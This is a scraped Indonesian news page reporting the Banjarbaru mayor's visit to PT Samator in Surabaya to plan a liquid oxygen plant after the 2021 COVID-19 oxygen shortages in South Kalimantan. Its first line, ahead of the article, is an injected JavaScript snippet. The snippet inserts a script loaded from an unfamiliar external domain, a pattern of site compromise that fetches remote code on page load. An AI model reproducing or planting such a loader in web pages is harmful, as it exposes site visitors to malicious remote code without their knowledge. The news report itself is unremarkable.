(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Kunjungi PT Samator di Surabaya, Aditya Jajaki Bangun Pabrik Oksigen Cair di Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU– Kelangkaan oksigen yang sempat terjadi beberapa waktu lalu saat kasus Covid-19 meningkat di Kalimantan Selatan (Kalsel), menjadi permasalahan yang perlu dicarikan solusi jangka panjang. Terkait hal ini, Wali Kota Banjarbaru Aditya Mufti Ariffin menjajaki pembangunan pabrik oksigen cair di Banjarbaru.

Sejak beberapa hari lalu, Wali Kota Aditya dengan didampingi Kepala Dinas Kesehatan dan Kepala BPPRD, bertolak ke PT Samator di Surabaya.

Kepada Kanalkalimantan.com, Aditya mengatakan melakukan kunjungan kerja ke Surabaya dengan agenda pembahasan rencana pembangunan pabrik oksigen cair dengan PT Samator.

“Jadi acara saya ke Surabaya, mengunjungi PT Samator. Kami membahas berkaitan rencana pembangunan liquid concentrat oxygen atau pembuatan oksigen cair, yang mana selama ini untuk bahan baku oksigen ini didatangkan dari luar Kalsel,” ujarnya, Rabu (29/9/2021).

Baca juga : Sidang Kekerasan terhadap Jurnalis Nurhadi, AJI Surabaya Kritik Perspektif Pengacara Terdakwa

Langkah itu dilakukan berkaca saat fase-fase tingginya angka kasus Covid-19 beberapa waktu lalu, acap kali di wilayah Banjarbaru mengalami krisis oksigen.

“Berdasarkan pengalaman beberapa waktu lalu ketika Covid sedang naik, kita sempat krisis oksigen, sehingga kami untuk menjaga ketersediaan oksigen bekerja sama dengan Samator gas mencoba membangun pabrik membuat oksigen cair ini di Kalsel khususnya di Banjarbaru,” jelas Aditya.

Sebagaimana diketahui, beberapa bulan lalu Kalsel sempat diwarnai krisis oksigen. Sejumlah rumah sakit di Kalsel kehabisan oksigen, seiring melonjaknya kasus Covid-19. Untungnya, Pj Gubernur Kalsel Safrizal ZA ketika itu mendatangkan banyak 56 ton liquid oksigen yang tiba di Pelabuhan Trisakti Banjarmasin, Minggu (25/7/2021) malam.

Kedatangan 56 ton liquid oksigen yang diangkut kapal tersebut, disambut oleh Pj Gubernur Kalsel Safrizal ZA. Pada kesempatan Safrizal mengatakan, oksigen itu nantinya untuk memenuhi pasokan sejumlah rumah sakit yang sudah mulai krisis.

 

Baca juga : Dua Film Ini Punya Kisah Alternatif Mengenai Tragedi 1965 selain Pengkhianatan G30S/PKI

Sejumlah warga serta rumah sakit mengaku kesulitan mendapatkan pasokan oksigen. Di antaranya RS Ratu Zalecha Martapura dan RSD Idaman Banjarbaru yang menyatakan untuk sementara tidak menerima pasien baru rawat inap yang memerlukan oksigen karena keterbatasan stok.

Persoalan kelangkaan oksigen di Kalsel juga menjadi perhatian serius Ketua Komisi IV DPRD Kalsel HM Lutfi Saifuddin. Ia mengatakan, Kalsel dalam kondisi genting di tengah banyak persoalan.

“Kita mengalami kelangkaan oksigen, banyak nakes (tenaga kesehatan) yang terpapar dan perlu perawatan, ambulan jenazah masih kurang, tim pemulasaran jenazah kurang, ICU dan ruang isolasi sudah penuh, parahnya lagi belum adanya pencairan tunjangan bagi para nakes,” tegasnya. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : cell


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

21 menit ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

43 menit ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

49 menit ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

1 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

1 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

2 jam ago

This website uses cookies.